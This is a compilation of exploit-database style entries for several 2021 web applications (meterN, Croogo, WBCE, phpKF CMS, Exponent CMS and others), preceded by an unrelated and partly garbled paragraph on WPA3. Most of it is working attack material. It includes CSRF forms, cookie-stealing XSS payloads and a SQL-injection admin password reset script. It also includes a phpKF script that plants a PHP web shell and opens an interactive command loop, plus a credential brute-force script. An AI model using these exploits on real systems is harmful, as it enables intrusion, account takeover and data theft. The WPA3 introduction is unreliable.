In January 2018, the Wi-Fi Alliance announced WPA3 to replace WPA2. The new standard 128-bit uses encryption in WPA3-person mode (WPA-PSK pre-shared key) or 192-bit WPA3-enterprise (RADIUS authentication server).
WPA3 will be harder to attack because its modern key establishment protocol is called "simultaneous verification equality" (SAE) or dragonfly key exchange. SAE improves security of initial key exchange and provides better protection against offline dictionary attacks.
But it is equally vulnerable to man-in-the-middle attacks and cannot resist evil WiFi phishing attacks.
# Exploit Title: meterN v1.2.3 - Remote Code Execution (RCE) (Authenticated)
# Date: 18/11/2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.metern.org
<!--
meterN v1.2.3 Authenticated Remote Command Execution Vulnerability
Vendor: Jean-Marc Louviaux
Product web page: https://www.metern.org
Affected version: 1.2.3 and 0.8.3.2
Summary: meterN is a set of PHP/JS files that make a -Home energy metering & monitoring- solution.
It accept any meters like : electrical, water, gas, fuel consumption, solar, Wind energy production
and so on. Sensors such as temperature or humidity are also accepted. The philosophy is: To keep it
simple, fast, with a low foot print to run on cheap and low powered devices.
Desc: The application suffers from an authenticated OS command execution vulnerability. This can be
exploited to execute arbitrary commands through the 'COMMANDx' and 'LIVECOMMANDx' POST parameters in
admin_meter2.php and admin_indicator2.php scripts. The application interface allows users to perform
these actions through HTTP requests without performing any validity checks to verify the requests.
This CSRF can be exploited to perform actions with administrative privileges if a logged-in user
visits a malicious web site.
---------------------------------------------------------------------------------------------------
/admin/admin_meter2.php:
------------------------
69: if (!empty($_POST['COMMANDx']) && is_string($_POST['COMMANDx'])) {
70: $COMMANDx = htmlspecialchars($_POST['COMMANDx'], ENT_QUOTES, 'UTF-8');
71: } else {
72: $COMMANDx = '';
73: }
...
...
108: if (!empty($_POST['LIVECOMMANDx']) && is_string($_POST['LIVECOMMANDx'])) {
109: $LIVECOMMANDx = htmlspecialchars($_POST['LIVECOMMANDx'], ENT_QUOTES, 'UTF-8');
110: } else {
111: $LIVECOMMANDx = '';
112: }
...
...
271: exec("$COMMANDx 2>&1", $datareturn);
...
...
303: exec("$LIVECOMMANDx 2>&1", $datareturn);
---------------------------------------------------------------------------------------------------
Tested on: Apache/2.4.10 (Raspbian)
Apache/2.4.46 (Win64)
Linux 4.9.67-v7+ GNU/Linux (armv7l)
Microsoft Windows 10 Home (10.0.19042 Build 19042)
PHP/7.2.33
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5690
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5690.php
18.11.2021
-->
PoC #1:
-------
<html>
<body>
<form action="http://localhost/metern/admin/admin_indicator2.php" method="POST">
<input type="hidden" name="NUMINDx" value="1" />
<input type="hidden" name="INDNAMEx1" value="test" />
<input type="hidden" name="IDx1" value="1" />
<input type="hidden" name="COMMANDx1" value="calc" />
<input type="hidden" name="bntsubmit1" value="Test command" />
<input type="hidden" name="UNITx1" value="" />
<input type="submit" value="Incongruity" />
</form>
</body>
</html>
PoC #2:
-------
<html>
<body>
<form action="http://localhost/metern/admin/admin_meter2.php" method="POST">
<input type="hidden" name="METNAMEx" value="Conso" />
<input type="hidden" name="COLORx" value="962629" />
<input type="hidden" name="TYPEx" value="Elect" />
<input type="hidden" name="PRODx" value="2" />
<input type="hidden" name="PHASEx" value="1" />
<input type="hidden" name="SKIPMONITORINGx" value="" />
<input type="hidden" name="IDx" value="elect" />
<input type="hidden" name="COMMANDx" value="houseenergy -energy" />
<input type="hidden" name="PASSOx" value="100000" />
<input type="hidden" name="PRICEx" value="0.23" />
<input type="hidden" name="LIDx" value="elect" />
<input type="hidden" name="LIVECOMMANDx" value="calc" />
<input type="hidden" name="bntsubmit" value="Test live command" />
<input type="hidden" name="EMAILx" value="" />
<input type="hidden" name="WARNCONSODx" value="15000" />
<input type="hidden" name="NORESPMx" value="true" />
<input type="hidden" name="POAKEYx" value="" />
<input type="hidden" name="POUKEYx" value="" />
<input type="hidden" name="TLGRTOKx" value="" />
<input type="hidden" name="TLGRCIDx" value="" />
<input type="hidden" name="met_numx" value="1" />
<input type="submit" value="Incongruity" />
</form>
</body>
</html>
# Exploit Title: Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration
# Date: 13/12/2021
# Exploit Author: Daniel Morales, IT Security Team - ARHS Spikeseed
# Vendor Homepage: https://www.cybelesoft.com
# Software Link: https://www.cybelesoft.com/thinfinity/virtualui/
# Version: vulnerable < v3.0
# Tested on: Microsoft Windows
# CVE: CVE-2021-44848
How it works: By accessing the vector, an attacker can determine if a username exists thanks to the message returned; it can be presented in different languages according to the configuration of VirtualUI. Common users are administrator, admin, guest...
Payload: The vulnerable vector is "https://example.com/changePassword?username=USERNAME" where "USERNAME" need to be brute-forced.
Reference: https://github.com/cybelesoft/virtualui/issues/1
# Exploit Title: Oliver Library Server v5 - Arbitrary File Download
# Date: 14/12/2021
# Exploit Authors: Mandeep Singh, Ishaan Vij, Luke Blues, CTRL Group
# Vendor Homepage: https://www.softlinkint.com/product/oliver/
# Product: Oliver Server v5
# Version: < 8.00.008.053
# Tested on: Windows Server 2016
Technical Description:
An arbitrary file download vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file download by an attacker using unsanitized user supplied input.
Steps to Exploit:
1) Use the following Payload:
https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=<arbitrary file path>
2) Example to download iis.log file:
https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=c:/windows/iis.log
# Exploit Title: Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF)
# Date: November 29, 2021
# Exploit Author: =(L_L)=
# Detailed Bug Description: https://lyhinslab.org/index.php/2021/11/29/how-white-box-hacking-works-xss-csrf-in-arunna/
# Vendor Homepage: https://github.com/arunna
# Software Link: https://github.com/arunna/arunna
# Version: 1.0.0
# Tested on: Ubuntu 20.04.2 LTS
<!--
The attacker can use the CSRF PoC below to change any sensitive user data (password, email, name and so on).
-->
<html><form enctype="application/x-www-form-urlencoded" method="POST" action="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"><table><tr><td>username[0]</td><td><input type="text" value="admin" name="username[0]"></td></tr><tr><td>select[0]</td><td><input type="text" value="" name="select[0]"></td></tr>
<tr><td>first_name[0]</td><td><input type="text" value="Raden" name="first_name[0]"></td></tr>
<tr><td>last_name[0]</td><td><input type="text" value="Yudistira" name="last_name[0]"></td></tr>
<tr><td>display_name[0]</td><td><input type="text" value="Raden Yudistira" name="display_name[0]"></td></tr>
<tr><td>one_liner[0]</td><td><input type="text" value="" name="one_liner[0]"></td></tr>
<tr><td>location[0]</td><td><input type="text" value="" name="location[0]"></td></tr>
<tr><td>sex[0]</td><td><input type="text" value="1" name="sex[0]"></td></tr>
<tr><td>birthday[0]</td><td><input type="text" value="19" name="birthday[0]"></td></tr>
<tr><td>birthmonth[0]</td><td><input type="text" value="3" name="birthmonth[0]"></td></tr>
<tr><td>birthyear[0]</td><td><input type="text" value="2011" name="birthyear[0]"></td></tr>
<tr><td>bio[0]</td><td><input type="text" value="" name="bio[0]"></td></tr>
<tr><td>expertise[0][]</td><td><input type="text" value="5" name="expertise[0][]"></td></tr>
<tr><td>tags[0]</td><td><input type="text" value="Graphic Designer, Blogger, Director" name="tags[0]"></td></tr>
<tr><td>skills[0]</td><td><input type="text" value="Cooking, JQuery, Fireworks" name="skills[0]"></td></tr>
<tr><td>email[0]</td><td><input type="text" value="request@arunna.com" name="email[0]"></td></tr>
<tr><td>website[0]</td><td><input type="text" value="http://" name="website[0]"></td></tr>
<tr><td>password[0]</td><td><input type="text" value="admin12345" name="password[0]"></td></tr>
<tr><td>re_password[0]</td><td><input type="text" value="admin12345" name="re_password[0]"></td></tr>
<tr><td>user_type[0]</td><td><input type="text" value="administrator" name="user_type[0]"></td></tr>
<tr><td>status[0]</td><td><input type="text" value="1" name="status[0]"></td></tr>
<tr><td>save_changes</td><td><input type="text" value="Save User" name="save_changes"></td></tr>
</table><input type="submit" value="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"></form></html>
# Exploit Title: Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 06/12/2021
# Exploit Author: Enes Özeser
# Vendor Homepage: https://croogo.org/
# Software Link: https://downloads.croogo.org/v3.0.2.zip
# Version: 3.0.2
# Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3
==> 'Content-Type' Stored Cross-Site Scripting (/admin/file-manager/attachments/add) <==
POST /admin/file-manager/attachments/add HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------114221148012003093972656004730
Content-Length: 923
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)/admin/file-manager/attachments/add
Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------114221148012003093972656004730
Content-Disposition: form-data; name="_method"
POST
-----------------------------114221148012003093972656004730
Content-Disposition: form-data; name="_csrfToken"
c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a
-----------------------------114221148012003093972656004730
Content-Disposition: form-data; name="file"; filename="file.txt"
Content-Type: <script>alert(document.cookie)</script>
Enes Ozeser (@enesozeser)
-----------------------------114221148012003093972656004730
Content-Disposition: form-data; name="_Token[fields]"
16ade00fae1eb7183f11fe75ed658ae4ec2a5921%3A
-----------------------------114221148012003093972656004730
Content-Disposition: form-data; name="_Token[unlocked]"
-----------------------------114221148012003093972656004730--
==> 'title' Stored Cross-Site Scripting (/admin/taxonomy/types/edit/) <==
POST /admin/taxonomy/types/edit/5 HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 590
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)admin/taxonomy/types/edit/5
Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&
title=<script>alert(document.cookie)</script>&alias=Alias&description=Description&vocabularies[_ids]=&comment_status=&comment_status=2&comment_approve=0&
comment_approve=1&comment_spam_protection=0&comment_captcha=0¶ms=routes=true&format_show_author=0&format_show_author=1&format_show_date=0&format_show_date=1&
format_use_wysiwyg=0&format_use_wysiwyg=1&_Token[fields]=ee5145e2485f47bddda98c72f96db218bffdd827%3A&_Token[unlocked]=_apply
==> 'title' Stored Cross-Site Scripting (/admin/blocks/regions/edit/) <==
POST /admin/blocks/regions/edit/3 HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 336
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)/admin/blocks/regions/edit/3
Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&
title=<script>alert(document.cookie)</script>&alias=Alias&_Token[fields]=49781a41a2787c301464989f09805bc79fa26c13%3A&_Token[unlocked]=_apply
==> 'title' Stored Cross-Site Scripting (/admin/file-manager/attachments/edit/) <==
POST /admin/file-manager/attachments/edit/20 HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 363
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)/admin/file-manager/attachments/edit/20
Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&
title=<script>alert(document.cookie)</script>&excerpt=&file_url=http://(HOST)/uploads/file.txt&file_type=text/plain&_Token[fields]=6170a60e541f596fe579a5e70fea879aafb9ac14%3A&_Token[unlocked]=_apply
# Exploit Title: Croogo 3.0.2 - Unrestricted File Upload
# Date: 06/12/2021
# Exploit Author: Enes Özeser
# Vendor Homepage: https://croogo.org/
# Software Link: https://downloads.croogo.org/v3.0.2.zip
# Version: 3.0.2
# Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3
==> 'setting-43' Unrestricted File Upload <==
1- Login with your privileged account.
2- Click on the 'Settings' section.
3- Go to the 'Themes'. Directory is '/admin/settings/settings/prefix/Theme'
4- Choose a malicious php script and upload it.
5- Go to the '/uploads/(NAME).php' directory. You must change 'NAME' parameter with your filename you uploaded.
6- The malicious PHP script will be executed.
POST /admin/settings/settings/prefix/Theme HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------360738881613175158033315978127
Content-Length: 970
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)/admin/settings/settings/prefix/Theme
Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------360738881613175158033315978127
Content-Disposition: form-data; name="_method"
POST
-----------------------------360738881613175158033315978127
Content-Disposition: form-data; name="_csrfToken"
c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a
-----------------------------360738881613175158033315978127
Content-Disposition: form-data; name="setting-43"; filename="malicious.php"
Content-Type: application/octet-stream
<?php
$command = shell_exec('netstat -an');
echo "<pre>$command</pre>";
?>
-----------------------------360738881613175158033315978127
Content-Disposition: form-data; name="_Token[fields]"
c4e0a45b25b5eaf8fa6e0e4ddcd3be00c621b803%3A
-----------------------------360738881613175158033315978127
Content-Disposition: form-data; name="_Token[unlocked]"
-----------------------------360738881613175158033315978127--
# Exploit Title: WBCE CMS 1.5.1 - Admin Password Reset
# Google Dork: intext: "Way Better Content Editing"
# Date: 20/12/2021
# Exploit Author: citril or https://github.com/maxway2021
# Vendor Homepage: https://wbce.org/
# Software Link: https://wbce.org/de/downloads/
# Version: <= 1.5.1
# Tested on: Linux
# CVE : CVE-2021-3817
# Github repo: https://github.com/WBCE/WBCE_CMS
# Writeup: https://medium.com/@citril/cve-2021-3817-from-sqli-to-plaintext-admin-password-recovery-13735773cc75
import requests
_url = 'http://localhost/wbce/admin/login/forgot/index.php' # from mylocalhost environment
_domain = 'pylibs.org' # you have to catch all emails! I used Namecheap domain controller's 'catch all emails and redirect to specific email address' feature
headers = {
'User-Agent': 'Mozilla/5.0',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'close'
}
_p = "email=%27/**/or/**/user_id=1/**/or/**/'admin%40" + _domain + "&submit=justrandomvalue"
r = requests.post(url = _url, headers = headers, data = _p)
if r.status_code == 200:
print('[+] Check your email, you are probably going to receive plaintext password which belongs to administrator.')
# Exploit Title: phpKF CMS 3.00 Beta y6 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 18/12/2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://www.phpkf.com/
# Software Link: https://www.phpkf.com/indirme.php
# Version: 3.00
# Category: Webapps
# Tested on: Linux/Windows
# phpKF-CMS; It is a very popular content management system for promotion, news, shopping, corporate, friends, blogs and more.
# Contains an endpoint that allows remote access
# Necessary checks are not made in the file upload mechanism, only the file extension is checked
# The file with the extension ".png" can be uploaded and the extension can be changed.
# Example: python3 exploit.py -u http://example.com
# python3 exploit.py -u http://example.com -l admin -p Admin123
from bs4 import BeautifulSoup
from time import sleep
import requests
import argparse
import json
def main():
parser = argparse.ArgumentParser(description='phpKF-CMS 3.00 Beta y6 - Remote Code Execution (Unauthenticated)')
parser.add_argument('-u', '--host', type=str, required=True)
parser.add_argument('-l', '--login', type=str, required=False)
parser.add_argument('-p', '--password', type=str, required=False)
args = parser.parse_args()
print("\nphpKF-CMS 3.00 Beta y6 - Remote Code Execution (Unauthenticated)",
"\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
host(args)
def host(args):
#Check http or https
if args.host.startswith(('http://', 'https://')):
print("[?] Check Url...\n")
sleep(2)
args.host = args.host
if args.host.endswith('/'):
args.host = args.host[:-1]
else:
pass
else:
print("\n[?] Check Adress...\n")
sleep(2)
args.host = "http://" + args.host
args.host = args.host
if args.host.endswith('/'):
args.host = args.host[:-1]
else:
pass
# Check Host Status
try:
response = requests.get(args.host)
if response.status_code == 200:
if args.login == None and args.password == None:
create_user(args)
else:
login_user(args)
else:
print("[-] Address not reachable!")
sleep(2)
except requests.ConnectionError as exception:
print("[-] Address not reachable!")
sleep(2)
exit(1)
def create_user(args):
print("[*] Create User!\n")
sleep(2)
url = args.host + "/phpkf-bilesenler/kayit_yap.php"
headers = {
"Origin": args.host,
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
"Referer": "http://fuzzing.com/uye-kayit.php",
"Accept-Encoding": "gzip, deflate"
}
data = {
"kayit_yapildi_mi": "form_dolu",
"oturum": '', "kullanici_adi": "evil",
"sifre": "Evil123",
"sifre2": "Evil123",
"posta": "evil@localhost.com",
"kosul": "on"
}
response = requests.post(url, headers=headers, data=data, allow_redirects=True)
args.login = ("evil")
args.password = ("Evil123")
print("[+] " + args.login + ":" + args.password + "\n")
sleep(2)
login_user(args)
def login_user(args):
url = args.host + "/uye-giris.php"
headers = {
"Origin": args.host,
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/uye-giris.php",
"Accept-Encoding": "gzip, deflate"
}
data = {
"kayit_yapildi_mi": "form_dolu",
"git": args.host + "/index.php",
"kullanici_adi": args.login,
"sifre": args.password,
"hatirla": "on"
}
response = requests.post(url, headers=headers, data=data, allow_redirects=False)
token = response.cookies.get("kullanici_kimlik")
if (token != None):
print("[!] Login Success!\n")
sleep(2)
upload_evil(args, token)
else:
if args.login == "evil" and args.password == "Evil123":
print("[!] Unauthorized user!\n")
print("[!] manually add a user and try again\n")
print("[!] Go to link " + args.host + "/uye-kayit.php\n")
print("python3 exploit.py -u '"+ args.host +"' -l 'attacker' -p 'p@ssW0rd'")
sleep(2)
else:
print("[!] Unauthorized user!\n")
sleep(2)
def upload_evil(args, token):
url = args.host + "/phpkf-bilesenler/yukleme/index.php"
cookies = {
"kullanici_kimlik": token,
"dil": "en"
}
headers = {
"VERICEK": "",
"DOSYA-ADI": "evil.png",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
"Content-type": "application/x-www-form-urlencoded; charset=utf-8",
"Accept": "*/*",
"Origin": args.host,
"Referer": args.host + "/oi_yaz.php",
"Accept-Encoding": "gzip, deflate"
}
data = "<?php if(isset($_GET['cmd'])){ $cmd = ($_GET['cmd']); system($cmd); die; } ?>"
response = requests.post(url, headers=headers, cookies=cookies, data=data)
if (response.text == "yuklendi"):
print("[!] Upload Success!\n")
sleep(2)
change_name(args, token)
else:
print("[!] Upload Failed!\n")
sleep(2)
def change_name(args, token):
url = args.host + "/phpkf-bilesenler/yukleme/index.php"
cookies = {
"kullanici_kimlik": token,
"dil": "en"
}
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
"Content-type": "application/x-www-form-urlencoded; charset=UTF-8",
"Accept": "*/*",
"Origin": args.host,
"Referer": args.host + "/oi_yaz.php",
"Accept-Encoding": "gzip, deflate"
}
data = {
"yenidenadlandir": "evil.png|evil.php",
"vericek": "/"
}
response = requests.post(url, headers=headers, cookies=cookies, data=data)
if (response.text == "Name successfully changed..."):
print("[!] Change Name evil.php!\n")
sleep(2)
find_dict(args, token)
else:
print("[!] Change Failed!\n")
sleep(2)
def find_dict(args, token):
url = args.host + "/phpkf-bilesenler/yukleme/index.php"
cookies = {
"kullanici_kimlik": token,
"dil": "en"
}
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
"Content-type": "application/x-www-form-urlencoded; charset=UTF-8",
"Accept": "*/*",
"Origin": args.host,
"Referer": args.host + "/oi_yaz.php",
"Accept-Encoding": "gzip, deflate"
}
data = {
"vericek": "/",
"dds": "0"
}
response = requests.post(url, headers=headers, cookies=cookies, data=data)
if (response.text == "You can not upload files!"):
print("[!] File not found!\n")
sleep(2)
else:
print("[!] Find Vuln File!\n")
sleep(2)
soup = BeautifulSoup(response.text, 'html.parser')
path = soup.find("div").contents[1].replace(" ", "")
exploit(args, path)
def exploit(args, path):
print("[+] Exploit Done!\n")
sleep(2)
while True:
cmd = input("$ ")
url = args.host + path + "evil.php?cmd=" + cmd
headers = {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
}
response = requests.post(url, headers=headers, timeout=5)
if response.text == "":
print(cmd + ": command not found\n")
else:
print(response.text)
if __name__ == '__main__':
main()
# Exploit Title: CMSimple 5.4 - Cross Site Scripting (XSS)
# Date: 22/10/2021
# Exploit Author: heinjame
# Vendor Homepage: https://www.cmsimple.org/en/
# Software Link: https://www.cmsimple.org/en/?Downloads
# Version: <=5.4
# Tested on: Linux os
[Description]
Since the application is filtering user input with preg_replace, attackers can able to bypass restriction by using HTML to Unicode encoding.
So the application let's attacker perform DOM based XSS.
[Payload and POC]
File > images > Upload a file
Attack vector >> ')-alert(1)// (need to encode)>>
')-alert(1)//
When the victim clicks the delete button,an alert will be executed.
Script to encode the payload
payload = input()
finalpayload = ""
for i in payload:
finalpayload = finalpayload + "&#" + str(ord(i)) + ";"
print(finalpayload)
# Exploit Title: Exponent CMS 2.6 - Multiple Vulnerabilities
# Exploit Author: heinjame
# Date: 22/10/2021
# Exploit Author: picaro_o
# Vendor Homepage: https://www.exponentcms.org/
# Version: <=2.6
# Tested on: Linux os
*Stored XSS*
Affected parameter = >
http://127.0.0.1:8082/expcms/text/edit/id/{id}/src/@footer (Title,
Text Block)
Payload = <iframe/src="data:text/html,<svg onload=alert(1)>">
** *Database credential are disclosed in response ***
POC
```
var adminerwindow = function (){
var win =
window.open('/expcms/external/adminer/admin.php?server=localhost&username=root&db=exponentcms');
if (!win) { err(); }
}
```
**Authentication Bruteforce*
```
import argparse
import requests
import sys
parser = argparse.ArgumentParser()
parser.add_argument("url", help="URL")
parser.add_argument("Username list", help="Username List")
parser.add_argument("Password list", help="Password List")
pargs = parser.parse_args()
host = sys.argv[1]
userlist = sys.argv[2]
passlist = sys.argv[3]
try:
readuser = open(userlist)
readpass = open(passlist)
except:
print("Unable to load files")
exit()
def usernamebrute():
s = requests.Session()
for username in readuser.readlines():
brute={
'controller':(None,'users'),
'src':(None,''),
'int':(None,''),
'action':(None,'send_new_password'),
'username':(None,username.strip()),
}
bruteforce = s.post(host+"/index.php",files=brute)
status = s.get(host+"/users/reset_password")
if "administrator" in status.text:
print("[+] Found username : "+ username)
adminaccount = username
checkpoint = True
return adminaccount,checkpoint
break
def passwordbrute(adminaccount):
s = requests.Session()
s.cookies.set("csrftoken", "abc")
header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0)
Gecko/20100101 Firefox/78.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'COntent-TYpE': 'applicatiOn/x-WWW-fOrm-urlencoded1',
'Referer': host+'/login/showlogin'
}
for password in readpass.readlines():
brute={
'controller':'login',
'src':'',
'int':'',
'action':'login',
'username':adminaccount,
'password':password.strip()
}
bruteforce = s.post(host+"/index.php",headers=header,data=brute)
# print(bruteforce.text)
status = s.get(host+"/login/showlogin",cookies=csrf)
print(status.text)
if "Invalid Username / Password" not in status.text:
print("[+] Found Password : "+ password)
break
adminaccount,checkpoint = usernamebrute()
if checkpoint == True:
passwordbrute(adminaccount)
else:
print("Can't find username,We can't proceed sorry :(")
```